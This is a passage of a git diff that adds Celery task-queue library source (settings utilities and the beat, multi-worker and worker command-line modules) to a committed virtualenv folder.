deprecated_settings=None, **kwargs): + super().__init__(*args, **kwargs) + + self.deprecated_settings = deprecated_settings + + @property + def broker_read_url(self): + return ( + os.environ.get('CELERY_BROKER_READ_URL') or + self.get('broker_read_url') or + self.broker_url + ) + + @property + def broker_write_url(self): + return ( + os.environ.get('CELERY_BROKER_WRITE_URL') or + self.get('broker_write_url') or + self.broker_url + ) + + @property + def broker_url(self): + return ( + os.environ.get('CELERY_BROKER_URL') or + self.first('broker_url', 'broker_host') + ) + + @property + def result_backend(self): + return ( + os.environ.get('CELERY_RESULT_BACKEND') or + self.first('result_backend', 'CELERY_RESULT_BACKEND') + ) + + @property + def task_default_exchange(self): + return self.first( + 'task_default_exchange', + 'task_default_queue', + ) + + @property + def task_default_routing_key(self): + return self.first( + 'task_default_routing_key', + 'task_default_queue', + ) + + @property + def timezone(self): + # this way we also support django's time zone. + return self.first('timezone', 'TIME_ZONE') + + def without_defaults(self): + """Return the current configuration, but without defaults.""" + # the last stash is the default settings, so just skip that + return Settings({}, self.maps[:-1]) + + def value_set_for(self, key): + return key in self.without_defaults() + + def find_option(self, name, namespace=''): + """Search for option by name. + + Example: + >>> from proj.celery import app + >>> app.conf.find_option('disable_rate_limits') + ('worker', 'prefetch_multiplier', + bool default->False>)) + + Arguments: + name (str): Name of option, cannot be partial. + namespace (str): Preferred name-space (``None`` by default). + Returns: + Tuple: of ``(namespace, key, type)``. + """ + return find(name, namespace) + + def find_value_for_key(self, name, namespace='celery'): + """Shortcut to ``get_by_parts(*find_option(name)[:-1])``.""" + return self.get_by_parts(*self.find_option(name, namespace)[:-1]) + + def get_by_parts(self, *parts): + """Return the current value for setting specified as a path. + + Example: + >>> from proj.celery import app + >>> app.conf.get_by_parts('worker', 'disable_rate_limits') + False + """ + return self['_'.join(part for part in parts if part)] + + def finalize(self): + # See PendingConfiguration in celery/app/base.py + # first access will read actual configuration. + try: + self['__bogus__'] + except KeyError: + pass + return self + + def table(self, with_defaults=False, censored=True): + filt = filter_hidden_settings if censored else lambda v: v + dict_members = dir(dict) + self.finalize() + settings = self if with_defaults else self.without_defaults() + return filt({ + k: v for k, v in settings.items() + if not k.startswith('_') and k not in dict_members + }) + + def humanize(self, with_defaults=False, censored=True): + """Return a human readable text showing configuration changes.""" + return '\n'.join( + f'{key}: {pretty(value, width=50)}' + for key, value in self.table(with_defaults, censored).items()) + + def maybe_warn_deprecated_settings(self): + # TODO: Remove this method in Celery 6.0 + if self.deprecated_settings: + from celery.app.defaults import _TO_NEW_KEY + from celery.utils import deprecated + for setting in self.deprecated_settings: + deprecated.warn(description=f'The {setting!r} setting', + removal='6.0.0', + alternative=f'Use the {_TO_NEW_KEY[setting]} instead') + + return True + + return False + + +def _new_key_to_old(key, convert=_TO_OLD_KEY.get): + return convert(key, key) + + +def _old_key_to_new(key, convert=_TO_NEW_KEY.get): + return convert(key, key) + + +_settings_info_t = namedtuple('settings_info_t', ( + 'defaults', 'convert', 'key_t', 'mix_error', +)) + +_settings_info = _settings_info_t( + DEFAULTS, _TO_NEW_KEY, _old_key_to_new, E_MIX_OLD_INTO_NEW, +) +_old_settings_info = _settings_info_t( + _OLD_DEFAULTS, _TO_OLD_KEY, _new_key_to_old, E_MIX_NEW_INTO_OLD, +) + + +def detect_settings(conf, preconf=None, ignore_keys=None, prefix=None, + all_keys=None, old_keys=None): + preconf = {} if not preconf else preconf + ignore_keys = set() if not ignore_keys else ignore_keys + all_keys = SETTING_KEYS if not all_keys else all_keys + old_keys = _OLD_SETTING_KEYS if not old_keys else old_keys + + source = conf + if conf is None: + source, conf = preconf, {} + have = set(source.keys()) - ignore_keys + is_in_new = have.intersection(all_keys) + is_in_old = have.intersection(old_keys) + + info = None + if is_in_new: + # have new setting names + info, left = _settings_info, is_in_old + if is_in_old and len(is_in_old) > len(is_in_new): + # Majority of the settings are old. + info, left = _old_settings_info, is_in_new + if is_in_old: + # have old setting names, or a majority of the names are old. + if not info: + info, left = _old_settings_info, is_in_new + if is_in_new and len(is_in_new) > len(is_in_old): + # Majority of the settings are new + info, left = _settings_info, is_in_old + else: + # no settings, just use new format. + info, left = _settings_info, is_in_old + + if prefix: + # always use new format if prefix is used. + info, left = _settings_info, set() + + # only raise error for keys that the user didn't provide two keys + # for (e.g., both ``result_expires`` and ``CELERY_TASK_RESULT_EXPIRES``). + really_left = {key for key in left if info.convert[key] not in have} + if really_left: + # user is mixing old/new, or new/old settings, give renaming + # suggestions. + raise ImproperlyConfigured(info.mix_error.format(renames='\n'.join( + FMT_REPLACE_SETTING.format(replace=key, with_=info.convert[key]) + for key in sorted(really_left) + ))) + + preconf = {info.convert.get(k, k): v for k, v in preconf.items()} + defaults = dict(deepcopy(info.defaults), **preconf) + return Settings( + preconf, [conf, defaults], + (_old_key_to_new, _new_key_to_old), + deprecated_settings=is_in_old, + prefix=prefix, + ) + + +class AppPickler: + """Old application pickler/unpickler (< 3.1).""" + + def __call__(self, cls, *args): + kwargs = self.build_kwargs(*args) + app = self.construct(cls, **kwargs) + self.prepare(app, **kwargs) + return app + + def prepare(self, app, **kwargs): + app.conf.update(kwargs['changes']) + + def build_kwargs(self, *args): + return self.build_standard_kwargs(*args) + + def build_standard_kwargs(self, main, changes, loader, backend, amqp, + events, log, control, accept_magic_kwargs, + config_source=None): + return {'main': main, 'loader': loader, 'backend': backend, + 'amqp': amqp, 'changes': changes, 'events': events, + 'log': log, 'control': control, 'set_as_current': False, + 'config_source': config_source} + + def construct(self, cls, **kwargs): + return cls(**kwargs) + + +def _unpickle_app(cls, pickler, *args): + """Rebuild app for versions 2.5+.""" + return pickler()(cls, *args) + + +def _unpickle_app_v2(cls, kwargs): + """Rebuild app for versions 3.1+.""" + kwargs['set_as_current'] = False + return cls(**kwargs) + + +def filter_hidden_settings(conf): + """Filter sensitive settings.""" + def maybe_censor(key, value, mask='*' * 8): + if isinstance(value, Mapping): + return filter_hidden_settings(value) + if isinstance(key, str): + if HIDDEN_SETTINGS.search(key): + return mask + elif 'broker_url' in key.lower(): + from kombu import Connection + return Connection(value).as_uri(mask=mask) + elif 'backend' in key.lower(): + return maybe_sanitize_url(value, mask=mask) + + return value + + return {k: maybe_censor(k, v) for k, v in conf.items()} + + +def bugreport(app): + """Return a string containing information useful in bug-reports.""" + import billiard + import kombu + + import celery + + try: + conn = app.connection() + driver_v = '{}:{}'.format(conn.transport.driver_name, + conn.transport.driver_version()) + transport = conn.transport_cls + except Exception: # pylint: disable=broad-except + transport = driver_v = '' + + return BUGREPORT_INFO.format( + system=_platform.system(), + arch=', '.join(x for x in _platform.architecture() if x), + kernel_version=_platform.release(), + py_i=pyimplementation(), + celery_v=celery.VERSION_BANNER, + kombu_v=kombu.__version__, + billiard_v=billiard.__version__, + py_v=_platform.python_version(), + driver_v=driver_v, + transport=transport, + results=maybe_sanitize_url(app.conf.result_backend or 'disabled'), + human_settings=app.conf.humanize(), + loader=qualname(app.loader.__class__), + ) + + +def find_app(app, symbol_by_name=symbol_by_name, imp=import_from_cwd): + """Find app by name.""" + from .base import Celery + + try: + sym = symbol_by_name(app, imp=imp) + except AttributeError: + # last part was not an attribute, but a module + sym = imp(app) + if isinstance(sym, ModuleType) and ':' not in app: + try: + found = sym.app + if isinstance(found, ModuleType): + raise AttributeError() + except AttributeError: + try: + found = sym.celery + if isinstance(found, ModuleType): + raise AttributeError( + "attribute 'celery' is the celery module not the instance of celery") + except AttributeError: + if getattr(sym, '__path__', None): + try: + return find_app( + f'{app}.celery', + symbol_by_name=symbol_by_name, imp=imp, + ) + except ImportError: + pass + for suspect in vars(sym).values(): + if isinstance(suspect, Celery): + return suspect + raise + else: + return found + else: + return found + return sym diff --git a/env/Lib/site-packages/celery/apps/__init__.py b/env/Lib/site-packages/celery/apps/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/celery/apps/beat.py b/env/Lib/site-packages/celery/apps/beat.py new file mode 100644 index 00000000..7258ac85 --- /dev/null +++ b/env/Lib/site-packages/celery/apps/beat.py @@ -0,0 +1,160 @@ +"""Beat command-line program. + +This module is the 'program-version' of :mod:`celery.beat`. + +It does everything necessary to run that module +as an actual application, like installing signal handlers +and so on. +""" +from __future__ import annotations + +import numbers +import socket +import sys +from datetime import datetime +from signal import Signals +from types import FrameType +from typing import Any + +from celery import VERSION_BANNER, Celery, beat, platforms +from celery.utils.imports import qualname +from celery.utils.log import LOG_LEVELS, get_logger +from celery.utils.time import humanize_seconds + +__all__ = ('Beat',) + +STARTUP_INFO_FMT = """ +LocalTime -> {timestamp} +Configuration -> + . broker -> {conninfo} + . loader -> {loader} + . scheduler -> {scheduler} +{scheduler_info} + . logfile -> {logfile}@%{loglevel} + . maxinterval -> {hmax_interval} ({max_interval}s) +""".strip() + +logger = get_logger('celery.beat') + + +class Beat: + """Beat as a service.""" + + Service = beat.Service + app: Celery = None + + def __init__(self, max_interval: int | None = None, app: Celery | None = None, + socket_timeout: int = 30, pidfile: str | None = None, no_color: bool | None = None, + loglevel: str = 'WARN', logfile: str | None = None, schedule: str | None = None, + scheduler: str | None = None, + scheduler_cls: str | None = None, # XXX use scheduler + redirect_stdouts: bool | None = None, + redirect_stdouts_level: str | None = None, + quiet: bool = False, **kwargs: Any) -> None: + self.app = app = app or self.app + either = self.app.either + self.loglevel = loglevel + self.logfile = logfile + self.schedule = either('beat_schedule_filename', schedule) + self.scheduler_cls = either( + 'beat_scheduler', scheduler, scheduler_cls) + self.redirect_stdouts = either( + 'worker_redirect_stdouts', redirect_stdouts) + self.redirect_stdouts_level = either( + 'worker_redirect_stdouts_level', redirect_stdouts_level) + self.quiet = quiet + + self.max_interval = max_interval + self.socket_timeout = socket_timeout + self.no_color = no_color + self.colored = app.log.colored( + self.logfile, + enabled=not no_color if no_color is not None else no_color, + ) + self.pidfile = pidfile + if not isinstance(self.loglevel, numbers.Integral): + self.loglevel = LOG_LEVELS[self.loglevel.upper()] + + def run(self) -> None: + if not self.quiet: + print(str(self.colored.cyan( + f'celery beat v{VERSION_BANNER} is starting.'))) + self.init_loader() + self.set_process_title() + self.start_scheduler() + + def setup_logging(self, colorize: bool | None = None) -> None: + if colorize is None and self.no_color is not None: + colorize = not self.no_color + self.app.log.setup(self.loglevel, self.logfile, + self.redirect_stdouts, self.redirect_stdouts_level, + colorize=colorize) + + def start_scheduler(self) -> None: + if self.pidfile: + platforms.create_pidlock(self.pidfile) + service = self.Service( + app=self.app, + max_interval=self.max_interval, + scheduler_cls=self.scheduler_cls, + schedule_filename=self.schedule, + ) + + if not self.quiet: + print(self.banner(service)) + + self.setup_logging() + if self.socket_timeout: + logger.debug('Setting default socket timeout to %r', + self.socket_timeout) + socket.setdefaulttimeout(self.socket_timeout) + try: + self.install_sync_handler(service) + service.start() + except Exception as exc: + logger.critical('beat raised exception %s: %r', + exc.__class__, exc, + exc_info=True) + raise + + def banner(self, service: beat.Service) -> str: + c = self.colored + return str( + c.blue('__ ', c.magenta('-'), + c.blue(' ... __ '), c.magenta('-'), + c.blue(' _\n'), + c.reset(self.startup_info(service))), + ) + + def init_loader(self) -> None: + # Run the worker init handler. + # (Usually imports task modules and such.) + self.app.loader.init_worker() + self.app.finalize() + + def startup_info(self, service: beat.Service) -> str: + scheduler = service.get_scheduler(lazy=True) + return STARTUP_INFO_FMT.format( + conninfo=self.app.connection().as_uri(), + timestamp=datetime.now().replace(microsecond=0), + logfile=self.logfile or '[stderr]', + loglevel=LOG_LEVELS[self.loglevel], + loader=qualname(self.app.loader), + scheduler=qualname(scheduler), + scheduler_info=scheduler.info, + hmax_interval=humanize_seconds(scheduler.max_interval), + max_interval=scheduler.max_interval, + ) + + def set_process_title(self) -> None: + arg_start = 'manage' in sys.argv[0] and 2 or 1 + platforms.set_process_title( + 'celery beat', info=' '.join(sys.argv[arg_start:]), + ) + + def install_sync_handler(self, service: beat.Service) -> None: + """Install a `SIGTERM` + `SIGINT` handler saving the schedule.""" + def _sync(signum: Signals, frame: FrameType) -> None: + service.sync() + raise SystemExit() + platforms.signals.update(SIGTERM=_sync, SIGINT=_sync) diff --git a/env/Lib/site-packages/celery/apps/multi.py b/env/Lib/site-packages/celery/apps/multi.py new file mode 100644 index 00000000..1fe60042 --- /dev/null +++ b/env/Lib/site-packages/celery/apps/multi.py @@ -0,0 +1,506 @@ +"""Start/stop/manage workers.""" +import errno +import os +import shlex +import signal +import sys +from collections import OrderedDict, UserList, defaultdict +from functools import partial +from subprocess import Popen +from time import sleep + +from kombu.utils.encoding import from_utf8 +from kombu.utils.objects import cached_property + +from celery.platforms import IS_WINDOWS, Pidfile, signal_name +from celery.utils.nodenames import gethostname, host_format, node_format, nodesplit +from celery.utils.saferepr import saferepr + +__all__ = ('Cluster', 'Node') + +CELERY_EXE = 'celery' + + +def celery_exe(*args): + return ' '.join((CELERY_EXE,) + args) + + +def build_nodename(name, prefix, suffix): + hostname = suffix + if '@' in name: + nodename = host_format(name) + shortname, hostname = nodesplit(nodename) + name = shortname + else: + shortname = f'{prefix}{name}' + nodename = host_format( + f'{shortname}@{hostname}', + ) + return name, nodename, hostname + + +def build_expander(nodename, shortname, hostname): + return partial( + node_format, + name=nodename, + N=shortname, + d=hostname, + h=nodename, + i='%i', + I='%I', + ) + + +def format_opt(opt, value): + if not value: + return opt + if opt.startswith('--'): + return f'{opt}={value}' + return f'{opt} {value}' + + +def _kwargs_to_command_line(kwargs): + return { + ('--{}'.format(k.replace('_', '-')) + if len(k) > 1 else f'-{k}'): f'{v}' + for k, v in kwargs.items() + } + + +class NamespacedOptionParser: + + def __init__(self, args): + self.args = args + self.options = OrderedDict() + self.values = [] + self.passthrough = '' + self.namespaces = defaultdict(lambda: OrderedDict()) + + def parse(self): + rargs = [arg for arg in self.args if arg] + pos = 0 + while pos < len(rargs): + arg = rargs[pos] + if arg == '--': + self.passthrough = ' '.join(rargs[pos:]) + break + elif arg[0] == '-': + if arg[1] == '-': + self.process_long_opt(arg[2:]) + else: + value = None + if len(rargs) > pos + 1 and rargs[pos + 1][0] != '-': + value = rargs[pos + 1] + pos += 1 + self.process_short_opt(arg[1:], value) + else: + self.values.append(arg) + pos += 1 + + def process_long_opt(self, arg, value=None): + if '=' in arg: + arg, value = arg.split('=', 1) + self.add_option(arg, value, short=False) + + def process_short_opt(self, arg, value=None): + self.add_option(arg, value, short=True) + + def optmerge(self, ns, defaults=None): + if defaults is None: + defaults = self.options + return OrderedDict(defaults, **self.namespaces[ns]) + + def add_option(self, name, value, short=False, ns=None): + prefix = short and '-' or '--' + dest = self.options + if ':' in name: + name, ns = name.split(':') + dest = self.namespaces[ns] + dest[prefix + name] = value + + +class Node: + """Represents a node in a cluster.""" + + def __init__(self, name, + cmd=None, append=None, options=None, extra_args=None): + self.name = name + self.cmd = cmd or f"-m {celery_exe('worker', '--detach')}" + self.append = append + self.extra_args = extra_args or '' + self.options = self._annotate_with_default_opts( + options or OrderedDict()) + self.expander = self._prepare_expander() + self.argv = self._prepare_argv() + self._pid = None + + def _annotate_with_default_opts(self, options): + options['-n'] = self.name + self._setdefaultopt(options, ['--pidfile', '-p'], '/var/run/celery/%n.pid') + self._setdefaultopt(options, ['--logfile', '-f'], '/var/log/celery/%n%I.log') + self._setdefaultopt(options, ['--executable'], sys.executable) + return options + + def _setdefaultopt(self, d, alt, value): + for opt in alt[1:]: + try: + return d[opt] + except KeyError: + pass + value = d.setdefault(alt[0], os.path.normpath(value)) + dir_path = os.path.dirname(value) + if dir_path and not os.path.exists(dir_path): + os.makedirs(dir_path) + return value + + def _prepare_expander(self): + shortname, hostname = self.name.split('@', 1) + return build_expander( + self.name, shortname, hostname) + + def _prepare_argv(self): + cmd = self.expander(self.cmd).split(' ') + i = cmd.index('celery') + 1 + + options = self.options.copy() + for opt, value in self.options.items(): + if opt in ( + '-A', '--app', + '-b', '--broker', + '--result-backend', + '--loader', + '--config', + '--workdir', + '-C', '--no-color', + '-q', '--quiet', + ): + cmd.insert(i, format_opt(opt, self.expander(value))) + + options.pop(opt) + + cmd = [' '.join(cmd)] + argv = tuple( + cmd + + [format_opt(opt, self.expander(value)) + for opt, value in options.items()] + + [self.extra_args] + ) + if self.append: + argv += (self.expander(self.append),) + return argv + + def alive(self): + return self.send(0) + + def send(self, sig, on_error=None): + pid = self.pid + if pid: + try: + os.kill(pid, sig) + except OSError as exc: + if exc.errno != errno.ESRCH: + raise + maybe_call(on_error, self) + return False + return True + maybe_call(on_error, self) + + def start(self, env=None, **kwargs): + return self._waitexec( + self.argv, path=self.executable, env=env, **kwargs) + + def _waitexec(self, argv, path=sys.executable, env=None, + on_spawn=None, on_signalled=None, on_failure=None): + argstr = self.prepare_argv(argv, path) + maybe_call(on_spawn, self, argstr=' '.join(argstr), env=env) + pipe = Popen(argstr, env=env) + return self.handle_process_exit( + pipe.wait(), + on_signalled=on_signalled, + on_failure=on_failure, + ) + + def handle_process_exit(self, retcode, on_signalled=None, on_failure=None): + if retcode < 0: + maybe_call(on_signalled, self, -retcode) + return -retcode + elif retcode > 0: + maybe_call(on_failure, self, retcode) + return retcode + + def prepare_argv(self, argv, path): + args = ' '.join([path] + list(argv)) + return shlex.split(from_utf8(args), posix=not IS_WINDOWS) + + def getopt(self, *alt): + for opt in alt: + try: + return self.options[opt] + except KeyError: + pass + raise KeyError(alt[0]) + + def __repr__(self): + return f'<{type(self).__name__}: {self.name}>' + + @cached_property + def pidfile(self): + return self.expander(self.getopt('--pidfile', '-p')) + + @cached_property + def logfile(self): + return self.expander(self.getopt('--logfile', '-f')) + + @property + def pid(self): + if self._pid is not None: + return self._pid + try: + return Pidfile(self.pidfile).read_pid() + except ValueError: + pass + + @pid.setter + def pid(self, value): + self._pid = value + + @cached_property + def executable(self): + return self.options['--executable'] + + @cached_property + def argv_with_executable(self): + return (self.executable,) + self.argv + + @classmethod + def from_kwargs(cls, name, **kwargs): + return cls(name, options=_kwargs_to_command_line(kwargs)) + + +def maybe_call(fun, *args, **kwargs): + if fun is not None: + fun(*args, **kwargs) + + +class MultiParser: + Node = Node + + def __init__(self, cmd='celery worker', + append='', prefix='', suffix='', + range_prefix='celery'): + self.cmd = cmd + self.append = append + self.prefix = prefix + self.suffix = suffix + self.range_prefix = range_prefix + + def parse(self, p): + names = p.values + options = dict(p.options) + ranges = len(names) == 1 + prefix = self.prefix + cmd = options.pop('--cmd', self.cmd) + append = options.pop('--append', self.append) + hostname = options.pop('--hostname', options.pop('-n', gethostname())) + prefix = options.pop('--prefix', prefix) or '' + suffix = options.pop('--suffix', self.suffix) or hostname + suffix = '' if suffix in ('""', "''") else suffix + range_prefix = options.pop('--range-prefix', '') or self.range_prefix + if ranges: + try: + names, prefix = self._get_ranges(names), range_prefix + except ValueError: + pass + self._update_ns_opts(p, names) + self._update_ns_ranges(p, ranges) + + return ( + self._node_from_options( + p, name, prefix, suffix, cmd, append, options) + for name in names + ) + + def _node_from_options(self, p, name, prefix, + suffix, cmd, append, options): + namespace, nodename, _ = build_nodename(name, prefix, suffix) + namespace = nodename if nodename in p.namespaces else namespace + return Node(nodename, cmd, append, + p.optmerge(namespace, options), p.passthrough) + + def _get_ranges(self, names): + noderange = int(names[0]) + return [str(n) for n in range(1, noderange + 1)] + + def _update_ns_opts(self, p, names): + # Numbers in args always refers to the index in the list of names. + # (e.g., `start foo bar baz -c:1` where 1 is foo, 2 is bar, and so on). + for ns_name, ns_opts in list(p.namespaces.items()): + if ns_name.isdigit(): + ns_index = int(ns_name) - 1 + if ns_index < 0: + raise KeyError(f'Indexes start at 1 got: {ns_name!r}') + try: + p.namespaces[names[ns_index]].update(ns_opts) + except IndexError: + raise KeyError(f'No node at index {ns_name!r}') + + def _update_ns_ranges(self, p, ranges): + for ns_name, ns_opts in list(p.namespaces.items()): + if ',' in ns_name or (ranges and '-' in ns_name): + for subns in self._parse_ns_range(ns_name, ranges): + p.namespaces[subns].update(ns_opts) + p.namespaces.pop(ns_name) + + def _parse_ns_range(self, ns, ranges=False): + ret = [] + for space in ',' in ns and ns.split(',') or [ns]: + if ranges and '-' in space: + start, stop = space.split('-') + ret.extend( + str(n) for n in range(int(start), int(stop) + 1) + ) + else: + ret.append(space) + return ret + + +class Cluster(UserList): + """Represent a cluster of workers.""" + + def __init__(self, nodes, cmd=None, env=None, + on_stopping_preamble=None, + on_send_signal=None, + on_still_waiting_for=None, + on_still_waiting_progress=None, + on_still_waiting_end=None, + on_node_start=None, + on_node_restart=None, + on_node_shutdown_ok=None, + on_node_status=None, + on_node_signal=None, + on_node_signal_dead=None, + on_node_down=None, + on_child_spawn=None, + on_child_signalled=None, + on_child_failure=None): + self.nodes = nodes + self.cmd = cmd or celery_exe('worker') + self.env = env + + self.on_stopping_preamble = on_stopping_preamble + self.on_send_signal = on_send_signal + self.on_still_waiting_for = on_still_waiting_for + self.on_still_waiting_progress = on_still_waiting_progress + self.on_still_waiting_end = on_still_waiting_end + self.on_node_start = on_node_start + self.on_node_restart = on_node_restart + self.on_node_shutdown_ok = on_node_shutdown_ok + self.on_node_status = on_node_status + self.on_node_signal = on_node_signal + self.on_node_signal_dead = on_node_signal_dead + self.on_node_down = on_node_down + self.on_child_spawn = on_child_spawn + self.on_child_signalled = on_child_signalled + self.on_child_failure = on_child_failure + + def start(self): + return [self.start_node(node) for node in self] + + def start_node(self, node): + maybe_call(self.on_node_start, node) + retcode = self._start_node(node) + maybe_call(self.on_node_status, node, retcode) + return retcode + + def _start_node(self, node): + return node.start( + self.env, + on_spawn=self.on_child_spawn, + on_signalled=self.on_child_signalled, + on_failure=self.on_child_failure, + ) + + def send_all(self, sig): + for node in self.getpids(on_down=self.on_node_down): + maybe_call(self.on_node_signal, node, signal_name(sig)) + node.send(sig, self.on_node_signal_dead) + + def kill(self): + return self.send_all(signal.SIGKILL) + + def restart(self, sig=signal.SIGTERM): + retvals = [] + + def restart_on_down(node): + maybe_call(self.on_node_restart, node) + retval = self._start_node(node) + maybe_call(self.on_node_status, node, retval) + retvals.append(retval) + + self._stop_nodes(retry=2, on_down=restart_on_down, sig=sig) + return retvals + + def stop(self, retry=None, callback=None, sig=signal.SIGTERM): + return self._stop_nodes(retry=retry, on_down=callback, sig=sig) + + def stopwait(self, retry=2, callback=None, sig=signal.SIGTERM): + return self._stop_nodes(retry=retry, on_down=callback, sig=sig) + + def _stop_nodes(self, retry=None, on_down=None, sig=signal.SIGTERM): + on_down = on_down if on_down is not None else self.on_node_down + nodes = list(self.getpids(on_down=on_down)) + if nodes: + for node in self.shutdown_nodes(nodes, sig=sig, retry=retry): + maybe_call(on_down, node) + + def shutdown_nodes(self, nodes, sig=signal.SIGTERM, retry=None): + P = set(nodes) + maybe_call(self.on_stopping_preamble, nodes) + to_remove = set() + for node in P: + maybe_call(self.on_send_signal, node, signal_name(sig)) + if not node.send(sig, self.on_node_signal_dead): + to_remove.add(node) + yield node + P -= to_remove + if retry: + maybe_call(self.on_still_waiting_for, P) + its = 0 + while P: + to_remove = set() + for node in P: + its += 1 + maybe_call(self.on_still_waiting_progress, P) + if not node.alive(): + maybe_call(self.on_node_shutdown_ok, node) + to_remove.add(node) + yield node + maybe_call(self.on_still_waiting_for, P) + break + P -= to_remove + if P and not its % len(P): + sleep(float(retry)) + maybe_call(self.on_still_waiting_end) + + def find(self, name): + for node in self: + if node.name == name: + return node + raise KeyError(name) + + def getpids(self, on_down=None): + for node in self: + if node.pid: + yield node + else: + maybe_call(on_down, node) + + def __repr__(self): + return '<{name}({0}): {1}>'.format( + len(self), saferepr([n.name for n in self]), + name=type(self).__name__, + ) + + @property + def data(self): + return self.nodes diff --git a/env/Lib/site-packages/celery/apps/worker.py b/env/Lib/site-packages/celery/apps/worker.py new file mode 100644 index 00000000..dcc04dac --- /dev/null +++ b/env/Lib/site-packages/celery/apps/worker.py @@ -0,0 +1,387 @@ +"""Worker command-line program. + +This module is the 'program-version' of :mod:`celery.worker`. + +It does everything necessary to run that module +as an actual application, like installing signal handlers, +platform tweaks, and so on. +""" +import logging +import os +import platform as _platform +import sys +from datetime import datetime +from functools import partial + +from billiard.common import REMAP_SIGTERM +from billiard.process import current_process +from kombu.utils.encoding import safe_str + +from celery import VERSION_BANNER, platforms, signals +from celery.app import trace +from celery.loaders.app import AppLoader +from celery.platforms import EX_FAILURE, EX_OK, check_privileges +from celery.utils import static, term +from celery.utils.debug import cry +from celery.utils.imports import qualname +from celery.utils.log import get_logger, in_sighandler, set_in_sighandler +from celery.utils.text import pluralize +from celery.worker import WorkController + +__all__ = ('Worker',) + +logger = get_logger(__name__) +is_jython = sys.platform.startswith('java') +is_pypy = hasattr(sys, 'pypy_version_info') + +ARTLINES = [ + ' --------------', + '--- ***** -----', + '-- ******* ----', + '- *** --- * ---', + '- ** ----------', + '- ** ----------', + '- ** ----------', + '- ** ----------', + '- *** --- * ---', + '-- ******* ----', + '--- ***** -----', + ' --------------', +] + +BANNER = """\ +{hostname} v{version} + +{platform} {timestamp} + +[config] +.> app: {app} +.> transport: {conninfo} +.> results: {results} +.> concurrency: {concurrency} +.> task events: {events} + +[queues] +{queues} +""" + +EXTRA_INFO_FMT = """ +[tasks] +{tasks} +""" + + +def active_thread_count(): + from threading import enumerate + return sum(1 for t in enumerate() + if not t.name.startswith('Dummy-')) + + +def safe_say(msg): + print(f'\n{msg}', file=sys.__stderr__, flush=True) + + +class Worker(WorkController): + """Worker as a program.""" + + def on_before_init(self, quiet=False, **kwargs): + self.quiet = quiet + trace.setup_worker_optimizations(self.app, self.hostname) + + # this signal can be used to set up configuration for + # workers by name. + signals.celeryd_init.send( + sender=self.hostname, instance=self, + conf=self.app.conf, options=kwargs, + ) + check_privileges(self.app.conf.accept_content) + + def on_after_init(self, purge=False, no_color=None, + redirect_stdouts=None, redirect_stdouts_level=None, + **kwargs): + self.redirect_stdouts = self.app.either( + 'worker_redirect_stdouts', redirect_stdouts) + self.redirect_stdouts_level = self.app.either( + 'worker_redirect_stdouts_level', redirect_stdouts_level) + super().setup_defaults(**kwargs) + self.purge = purge + self.no_color = no_color + self._isatty = sys.stdout.isatty() + self.colored = self.app.log.colored( + self.logfile, + enabled=not no_color if no_color is not None else no_color + ) + + def on_init_blueprint(self): + self._custom_logging = self.setup_logging() + # apply task execution optimizations + # -- This will finalize the app! + trace.setup_worker_optimizations(self.app, self.hostname) + + def on_start(self): + app = self.app + super().on_start() + + # this signal can be used to, for example, change queues after + # the -Q option has been applied. + signals.celeryd_after_setup.send( + sender=self.hostname, instance=self, conf=app.conf, + ) + + if self.purge: + self.purge_messages() + + if not self.quiet: + self.emit_banner() + + self.set_process_status('-active-') + self.install_platform_tweaks(self) + if not self._custom_logging and self.redirect_stdouts: + app.log.redirect_stdouts(self.redirect_stdouts_level) + + # TODO: Remove the following code in Celery 6.0 + # This qualifies as a hack for issue #6366. + warn_deprecated = True + config_source = app._config_source + if isinstance(config_source, str): + # Don't raise the warning when the settings originate from + # django.conf:settings + warn_deprecated = config_source.lower() not in [ + 'django.conf:settings', + ] + + if warn_deprecated: + if app.conf.maybe_warn_deprecated_settings(): + logger.warning( + "Please run `celery upgrade settings path/to/settings.py` " + "to avoid these warnings and to allow a smoother upgrade " + "to Celery 6.0." + ) + + def emit_banner(self): + # Dump configuration to screen so we have some basic information + # for when users sends bug reports. + use_image = term.supports_images() + if use_image: + print(term.imgcat(static.logo())) + print(safe_str(''.join([ + str(self.colored.cyan( + ' \n', self.startup_info(artlines=not use_image))), + str(self.colored.reset(self.extra_info() or '')), + ])), file=sys.__stdout__, flush=True) + + def on_consumer_ready(self, consumer): + signals.worker_ready.send(sender=consumer) + logger.info('%s ready.', safe_str(self.hostname)) + + def setup_logging(self, colorize=None): + if colorize is None and self.no_color is not None: + colorize = not self.no_color + return self.app.log.setup( + self.loglevel, self.logfile, + redirect_stdouts=False, colorize=colorize, hostname=self.hostname, + ) + + def purge_messages(self): + with self.app.connection_for_write() as connection: + count = self.app.control.purge(connection=connection) + if count: # pragma: no cover + print(f"purge: Erased {count} {pluralize(count, 'message')} from the queue.\n", flush=True) + + def tasklist(self, include_builtins=True, sep='\n', int_='celery.'): + return sep.join( + f' . {task}' for task in sorted(self.app.tasks) + if (not task.startswith(int_) if not include_builtins else task) + ) + + def extra_info(self): + if self.loglevel is None: + return + if self.loglevel <= logging.INFO: + include_builtins = self.loglevel <= logging.DEBUG + tasklist = self.tasklist(include_builtins=include_builtins) + return EXTRA_INFO_FMT.format(tasks=tasklist) + + def startup_info(self, artlines=True): + app = self.app + concurrency = str(self.concurrency) + appr = '{}:{:#x}'.format(app.main or '__main__', id(app)) + if not isinstance(app.loader, AppLoader): + loader = qualname(app.loader) + if loader.startswith('celery.loaders'): # pragma: no cover + loader = loader[14:] + appr += f' ({loader})' + if self.autoscale: + max, min = self.autoscale + concurrency = f'{{min={min}, max={max}}}' + pool = self.pool_cls + if not isinstance(pool, str): + pool = pool.__module__ + concurrency += f" ({pool.split('.')[-1]})" + events = 'ON' + if not self.task_events: + events = 'OFF (enable -E to monitor tasks in this worker)' + + banner = BANNER.format( + app=appr, + hostname=safe_str(self.hostname), + timestamp=datetime.now().replace(microsecond=0), + version=VERSION_BANNER, + conninfo=self.app.connection().as_uri(), + results=self.app.backend.as_uri(), + concurrency=concurrency, + platform=safe_str(_platform.platform()), + events=events, + queues=app.amqp.queues.format(indent=0, indent_first=False), + ).splitlines() + + # integrate the ASCII art. + if artlines: + for i, _ in enumerate(banner): + try: + banner[i] = ' '.join([ARTLINES[i], banner[i]]) + except IndexError: + banner[i] = ' ' * 16 + banner[i] + return '\n'.join(banner) + '\n' + + def install_platform_tweaks(self, worker): + """Install platform specific tweaks and workarounds.""" + if self.app.IS_macOS: + self.macOS_proxy_detection_workaround() + + # Install signal handler so SIGHUP restarts the worker. + if not self._isatty: + # only install HUP 